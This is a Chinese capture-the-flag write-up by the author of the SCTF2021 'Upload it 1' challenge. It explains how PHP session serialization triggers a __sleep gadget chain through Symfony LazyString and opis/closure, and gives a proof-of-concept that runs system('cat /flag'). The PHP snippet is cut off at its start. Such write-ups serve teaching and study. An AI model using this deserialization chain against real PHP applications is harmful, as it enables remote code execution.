Rating:

# Upload it 1

~~被非预期惨了(~~

# How to Start and Stop
## start
```shell
docker-compose up -d
```

## stop
```shell
docker-compose down --rmi all
```

# writeup

题目是一个任意文件上传,但当前目录没有写权限,只能上传到/tmp目录。
题目有`composer.json`,导入了两个包。
```json
{
"name": "sctf2021/upload",
"authors": [
{
"name": "AFKL",
"email": "[email protected]"
}
],
"require": {
"symfony/string": "^5.3",
"opis/closure": "^3.6"
}
}
```

## 预期解
在出完`ezsou`一题后,我注意到`imi`框架作者使用序列化来统计字符串长度,导致触发了`__sleep`链。我便想php的原生session是否也会触发。于是便去审计php源码。

在`session.c#L2744`中,可以发现session组件在一个请求结束后判断session是否active,如果active就去调用`php_session_flush`函数。

![image-20211230171214360](https://gitee.com/AFKL/image/raw/master/img/image-20211230171214360.png)

![image-20211230171409423](https://gitee.com/AFKL/image/raw/master/img/image-20211230171409423.png)

![image-20211230171503656](https://gitee.com/AFKL/image/raw/master/img/image-20211230171503656.png)

经过一系列调用,最终程序会走到`php_session_encode`中,而这个函数会调用对应的session.serialize_handler。

![image-20211230171751978](https://gitee.com/AFKL/image/raw/master/img/image-20211230171751978.png)

题目中的handler通过phpinfo得知为`php`

![image-20211230171933991](https://gitee.com/AFKL/image/raw/master/img/image-20211230171933991.png)

而`php`handler的`encode`实现中必然调用了序列化函数,那么说明`php`的原生session同样可以触发`__sleep`链。

![image-20211230172121544](https://gitee.com/AFKL/image/raw/master/img/image-20211230172121544.png)

那么这样只需要通过`LazyString`的`__sleep`点调用匿名函数库即可。

```php
value = $a;
}
}
}

namespace {
include_once "vendor/autoload.php";
$func = function() {system("cat /flag");};
$raw = \Opis\Closure\serialize($func);
$data = unserialize($raw);
$exp = new \Symfony\Component\String\LazyString($data);

var_dump(base64_encode(serialize($exp)));
}
```

## 十万乃至九万的非预期

这道题最失败的一点,如同某位大师傅说的:

![image-20211231024912928](https://gitee.com/AFKL/image/raw/master/img/image-20211231024912928.png)

确实这种组件必然有写就有读,而且触发过于简单,导致许多人并没有注意到触发`__sleep`链的这个操作就把题做出来了,这脱离了我出这题的初衷...

还有就是我对库本身还不够理解,例如我并不知道匿名函数库中的function字段可以将`function() {system("cat /f*");}`修改为一段代码`system("cat /f*")`。这样可以直接在反序列化的时候触发。这也是为什么我临时出了一道`Upload it 2`。

![image-20211231030648347](https://gitee.com/AFKL/image/raw/master/img/image-20211231030648347.png)

还有就是session中的属性有字符串操作,导致其直接触发了`__toString`...

总的来说`upload it`两题出的很失败,希望师傅们多多谅解,也希望师傅们可以通过这个wp学到东西。

Original writeup (https://github.com/SycloverTeam/SCTF2021/tree/master/web/Upload_it_1).